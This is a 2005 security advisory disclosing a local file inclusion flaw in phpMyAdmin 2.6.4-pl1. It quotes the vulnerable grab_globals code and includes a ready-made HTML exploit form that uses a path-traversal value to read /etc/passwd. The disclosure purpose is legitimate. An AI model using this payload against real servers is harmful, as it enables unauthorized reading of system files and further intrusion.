<html><head><meta name="qrichtext" content="1" /></head><body style="font-size:12pt;font-family:Luxi Mono">
<p>-----BEGIN PGP SIGNED MESSAGE-----</p>
<p>Hash: SHA1</p>
<p></p>
<p>[phpMyAdmin Local file inclusion 2.6.4-pl1]</p>
<p></p>
<p>Author: Maksymilian Arciemowicz ( cXIb8O3 ).18</p>
<p>Date: 10.10.2005</p>
<p>from SECURITYREASON.COM</p>
<p></p>
<p>- --- 0.Description ---</p>
<p>phpMyAdmin 2.6.4 is a tool written in PHP intended to</p>
<p>handle the administration of MySQL over the Web.</p>
<p>Currently it can create and drop databases,</p>
<p>create/drop/alter tables, delete/edit/add fields,</p>
<p>execute any SQL statement, manage keys on fields.</p>
<p>blablabla...</p>
<p>phpMyAdmin is very dangerous script.</p>
<p></p>
<p>- --- 1. Local file inclusion (Critical) ---</p>
<p>File: ./libraries/grab_globals.lib.php</p>
<p></p>
<p>This file is included by many files. Example file index.php</p>
<p></p>
<p>- -index.php--</p>
<p><?php</p>
<p>/* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */</p>
<p>// vim: expandtab sw=4 ts=4 sts=4:</p>
<p></p>
<p>/**</p>
<p> * Gets core libraries and defines some variables</p>
<p> */</p>
<p>require_once('./libraries/grab_globals.lib.php');</p>
<p>require_once('./libraries/common.lib.php');</p>
<p>...</p>
<p>- -index.php--</p>
<p></p>
<p>ok so. In ./libraries/grab_globals.lib.php we have:</p>
<p></p>
<p>- -101-104-grab_globals.lib.php---------</p>
<p>if ( ! empty( $__redirect ) ) {</p>
<p> require('./' . $__redirect);</p>
<p> exit();</p>
<p>} // end if ( ! empty( $__redirect ) )</p>
<p>- -101-104-grab_globals.lib.php---------</p>
<p></p>
<p>But before we have</p>
<p></p>
<p>- -53-67-grab_globals.lib.php-----------</p>
<p>// check if a subform is submitted</p>
<p>$__redirect = NULL;</p>
<p>if ( isset( $_POST['usesubform'] ) ) {</p>
<p> // if a subform is present and should be used</p>
<p> // the rest of the form is deprecated</p>
<p> $subform_id = key( $_POST['usesubform'] );</p>
<p> $subform = $_POST['subform'][$subform_id];</p>
<p> $_POST = $subform;</p>
<p> if ( isset( $_POST['redirect'] ) </p>
<p> && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) {</p>
<p> $__redirect = $_POST['redirect'];</p>
<p> unset( $_POST['redirect'] );</p>
<p> } // end if ( isset( $_POST['redirect'] ) )</p>
<p>} // end if ( isset( $_POST['usesubform'] ) )</p>
<p>// end check if a subform is submitted</p>
<p>- -53-67-grab_globals.lib.php-----------</p>
<p></p>
<p>If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']).</p>
<p></p>
<p> $subform = $_POST['subform'][$subform_id];</p>
<p> $_POST = $subform;</p>
<p></p>
<p>where array $_POST = array $_POST[subform][1]</p>
<p>that</p>
<p>$_POST['redirect']=$_POST[subform][1][redirect]</p>
<p></p>
<p>and we have local file inclusion.</p>
<p></p>
<p>Example response in html:</p>
<p></p>
<p>- -Exploit---</p>
<p><CENTER></p>
<p><A HREF="http://www.securityreason.com><IMG SRC="http://securityreason.com/gfx/small_logo.png"></A><P></p>
<p><FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data"></p>
<p><input TYPE="hidden" name="usesubform[1]" value="1"></p>
<p><input TYPE="hidden" name="usesubform[2]" value="1"></p>
<p><input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p></p>
<p><input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"></p>
<p><input TYPE="submit" value="Exploit"></p>
<p></FORM></p>
<p>- -Exploit---</p>
<p></p>
<p>Exploit:</p>
<p>http://securityreason.com/achievement_exploitalert/2</p>
<p></p>
<p>- --- 2. Greets ---</p>
<p></p>
<p>sp3x</p>
<p></p>
<p>- --- 3.Contact ---</p>
<p>Author: Maksymilian Arciemowicz < cXIb8O3 ></p>
<p>Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com</p>
<p>GPG-KEY: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg</p>
<p>WWW: http://securityreason.com</p>
<p>-----BEGIN PGP SIGNATURE-----</p>
<p>Version: GnuPG v1.4.2 (FreeBSD)</p>
<p></p>
<p>iD8DBQFDSnd/3Ke13X/fTO4RAse3AKCAT3s7bzwySDsGHqYN0+Vm+D+OiwCdFf/T</p>
<p>cvqCRiRlK9XrQGvV3sYxzXQ=</p>
<p>=yoDY</p>
<p>-----END PGP SIGNATURE-----</p>
<p></p>
</body></html>